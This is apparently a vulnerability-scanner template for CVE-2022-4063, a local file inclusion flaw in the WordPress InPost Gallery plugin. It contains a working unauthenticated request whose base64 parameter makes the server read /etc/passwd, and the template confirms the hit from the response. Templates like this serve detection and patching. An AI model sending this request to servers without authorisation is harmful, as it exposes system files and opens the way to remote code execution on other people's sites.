id: CVE-2022-4063 info: name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion author: theamanrawat severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 - https://wordpress.org/plugins/inpost-gallery/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 epss-score: 0.02084 epss-percentile: 0.87836 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: pluginus product: inpost_gallery framework: wordpress tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==" matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a004730450220170f575e194264a76393ad005ed022ab51fb91c9b152c23a994e3f0f1867eca6022100dd3703fe680ccb832df4aafe750c6d716bdcd8f853d7b848a2ad95bd992acb69:922c64590222798bb761d5b6d8e72950